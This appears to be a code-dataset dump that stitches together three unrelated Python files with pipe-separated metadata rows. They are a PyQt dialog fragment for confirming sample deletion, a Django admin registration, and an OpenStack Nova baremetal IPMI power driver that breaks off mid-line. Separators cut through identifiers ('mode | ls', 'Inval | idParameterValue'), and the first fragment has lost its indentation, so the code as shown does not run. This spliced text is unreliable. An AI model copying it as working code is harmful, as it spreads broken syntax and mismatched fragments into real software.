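    #   btn = QtGui.QPushButton(Dialog)
    #   btn.clicked.connect(partial(self.ask_apply_changes, [row_index, Dialog]))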
def ask_delete_confirm1(self, args):
sid = args[0]
Dialog = args[1]
# check if radio button is checked.
if self.radios[sid].isChecked():
msg = "Are you sure you want to delete the following sample : \n\n"
details = ""
for c in self.samplesdf.columns:
details += str(c) + ": " + str(self.samplesdf.at[sid, c]) + "\n"
reply = QtGui.QMessageBox.warning(self, 'Confirmation #1',
msg + details, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
msg2 = "Are you sure REALLY REALLY sure you want to delete the following sample ? \n\n" + \
"This is the last confirmation message. After confirming, the files will be PERMANENTLY deleted and the data WILL be lost ! \n\n"
msgbox = QtGui.QMessageBox.critical(self, 'Confirmation #2',
msg2 + details, QtGui. |
1orwell/proghelp | proghelp/events/admin.py | Python | mit | 94 | 0.010638 | from django.contrib import admin
from events.mode | ls import Event
a | dmin.site.register(Event)
|
fajoy/nova | nova/virt/baremetal/ipmi.py | Python | apache-2.0 | 8,800 | 0.000568 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# coding=utf-8
# Copyright 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2012 NTT DOCOMO, INC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF | ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Baremetal IPMI power manager.
"""
import os
import stat
import tempfile
from nova.exception import Inval | idParameterValue
from nova.openstack.common import cfg
from nova.openstack.common import log as logging
from nova import paths
from nova import utils
from nova.virt.baremetal import baremetal_states
from nova.virt.baremetal import base
from nova.virt.baremetal import utils as bm_utils
opts = [
cfg.StrOpt('terminal',
default='shellinaboxd',
help='path to baremetal terminal program'),
cfg.StrOpt('terminal_cert_dir',
default=None,
help='path to baremetal terminal SSL cert(PEM)'),
cfg.StrOpt('terminal_pid_dir',
default=paths.state_path_def('baremetal/console'),
               help='path to directory storing pidfiles of baremetal_terminal'),
cfg.IntOpt('ipmi_power_retry',
default=5,
               help='maximum number of retries for IPMI operations'),
]
baremetal_group = cfg.OptGroup(name='baremetal',
title='Baremetal Options')
CONF = cfg.CONF
CONF.register_group(baremetal_group)
CONF.register_opts(opts, baremetal_group)
LOG = logging.getLogger(__name__)
def _make_password_file(password):
fd, path = tempfile.mkstemp()
os.fchmod(fd, stat.S_IRUSR | stat.S_IWUSR)
with os.fdopen(fd, "w") as f:
f.write(password)
return path
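# A usage sketch for the helper above (illustrative, not part of the module):
# the caller owns the temporary file and must remove it once ipmitool has
# read it, exactly as _exec_ipmitool below does:
#
#   pwfile = _make_password_file('secret')
#   try:
#       pass  # hand pwfile to ipmitool via its -f option
#   finally:
#       bm_utils.unlink_without_raise(pwfile)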
def _get_console_pid_path(node_id):
name = "%s.pid" % node_id
path = os.path.join(CONF.baremetal.terminal_pid_dir, name)
return path
def _get_console_pid(node_id):
pid_path = _get_console_pid_path(node_id)
if os.path.exists(pid_path):
with open(pid_path, 'r') as f:
pid_str = f.read()
try:
return int(pid_str)
except ValueError:
LOG.warn(_("pid file %s does not contain any pid"), pid_path)
return None
class IPMI(base.PowerManager):
"""IPMI Power Driver for Baremetal Nova Compute
    This PowerManager class provides a mechanism for controlling the power state
of physical hardware via IPMI calls. It also provides serial console access
where available.
"""
def __init__(self, node, **kwargs):
self.state = None
self.retries = None
self.node_id = node['id']
self.address = node['pm_address']
self.user = node['pm_user']
self.password = node['pm_password']
self.port = node['terminal_port']
        if self.node_id is None:
            raise InvalidParameterValue(_("Node id not supplied to IPMI"))
        if self.address is None:
            raise InvalidParameterValue(_("Address not supplied to IPMI"))
        if self.user is None:
            raise InvalidParameterValue(_("User not supplied to IPMI"))
        if self.password is None:
            raise InvalidParameterValue(_("Password not supplied to IPMI"))
def _exec_ipmitool(self, command):
args = ['ipmitool',
'-I',
'lanplus',
'-H',
self.address,
'-U',
self.user,
'-f']
pwfile = _make_password_file(self.password)
try:
args.append(pwfile)
args.extend(command.split(" "))
out, err = utils.execute(*args, attempts=3)
            LOG.debug(_("ipmitool stdout: '%(out)s', stderr: '%(err)s'"),
                      locals())
return out, err
finally:
bm_utils.unlink_without_raise(pwfile)
def _is_power(self, state):
out_err = self._exec_ipmitool("power status")
return out_err[0] == ("Chassis Power is %s\n" % state)
def _power_on(self):
"""Turn the power to this node ON"""
def _wait_for_power_on():
"""Called at an interval until the node's power is on"""
if self._is_power("on"):
self.state = baremetal_states.ACTIVE
raise utils.LoopingCallDone()
if self.retries > CONF.baremetal.ipmi_power_retry:
self.state = baremetal_states.ERROR
raise utils.LoopingCallDone()
try:
self.retries += 1
self._exec_ipmitool("power on")
except Exception:
LOG.exception(_("IPMI power on failed"))
self.retries = 0
timer = utils.FixedIntervalLoopingCall(_wait_for_power_on)
timer.start(interval=0.5).wait()
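        # Generic form of the polling pattern above, assuming
        # FixedIntervalLoopingCall re-invokes the callback every `interval`
        # seconds until it raises LoopingCallDone:
        #
        #   def _poll():
        #       if done():
        #           raise utils.LoopingCallDone()
        #       attempt_once()
        #   utils.FixedIntervalLoopingCall(_poll).start(interval=0.5).wait()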
def _power_off(self):
"""Turn the power to this node OFF"""
def _wait_for_power_off():
"""Called at an interval until the node's power is off"""
if self._is_power("off"):
self.state = baremetal_states.DELETED
raise utils.LoopingCallDone()
if self.retries > CONF.baremetal.ipmi_power_retry:
self.state = baremetal_states.ERROR
raise utils.LoopingCallDone()
try:
self.retries += 1
self._exec_ipmitool("power off")
except Exception:
LOG.exception(_("IPMI power off failed"))
self.retries = 0
timer = utils.FixedIntervalLoopingCall(_wait_for_power_off)
timer.start(interval=0.5).wait()
def _set_pxe_for_next_boot(self):
try:
self._exec_ipmitool("chassis bootdev pxe")
except Exception:
LOG.exception(_("IPMI set next bootdev failed"))
def activate_node(self):
"""Turns the power to node ON"""
if self._is_power("on") and self.state == baremetal_states.ACTIVE:
LOG.warning(_("Activate node called, but node %s "
"is already active") % self.address)
self._set_pxe_for_next_boot()
self._power_on()
return self.state
def reboot_node(self):
"""Cycles the power to a node"""
self._power_off()
self._set_pxe_for_next_boot()
self._power_on()
return self.state
def deactivate_node(self):
"""Turns the power to node OFF, regardless of current state"""
self._power_off()
return self.state
def is_power_on(self):
return self._is_power("on")
def start_console(self):
if not self.port:
return
args = []
args.append(CONF.baremetal.terminal)
if CONF.baremetal.terminal_cert_dir:
args.append("-c")
args.append(CONF.baremetal.terminal_cert_dir)
else:
args.append("-t")
args.append("-p")
args.append(str(self.port))
args.append("--background=%s" % _get_console_pid_path(self.node_id))
args.append("-s")
try:
pwfile = _make_password_file(self.password)
ipmi_args = "/:%(uid)s:%(gid)s:HOME:ipmitool -H %(address)s" \
" -I lanplus -U %(user)s -f %(pwfile)s sol activate" \
% {'uid': os.getuid(),
'gid': os.getgid(),
'address': self.address,
'user': self.user,
'pwfile': pwfile,
}
args.append(ipmi_args)
            # Run shellinaboxd without pipes. Otherwise utils.execute() waits
            # indefinitely since shellinaboxd does not close the passed fds.
x = ["'" + arg.replace("'", "'\\''") + "'" f |